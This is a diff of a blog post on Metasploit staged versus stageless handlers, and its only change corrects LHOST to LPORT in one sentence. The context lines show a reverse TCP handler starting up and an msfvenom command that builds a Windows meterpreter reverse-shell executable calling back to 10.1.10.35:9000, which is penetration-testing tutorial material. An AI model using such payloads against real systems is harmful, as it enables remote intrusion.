OJ/buffered.io-hugo/content/post/2016-10-05-staged-vs-stageless-handlers.markdown

 [*] [2016.10.05-12:29:48] Started reverse TCP handler on 10.1.10.35:9000
 msf exploit(handler) > [*] [2016.10.05-12:29:48] Starting the payload handler...
 ```
-This time, when we create a payload for this listener, we use the `ReverseListenerBindPort` value for `LHOST`:
+This time, when we create a payload for this listener, we use the `ReverseListenerBindPort` value for `LPORT`:
 ```
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.10.35 LPORT=9000 -f exe -o /tmp/staged9000.exe
 ```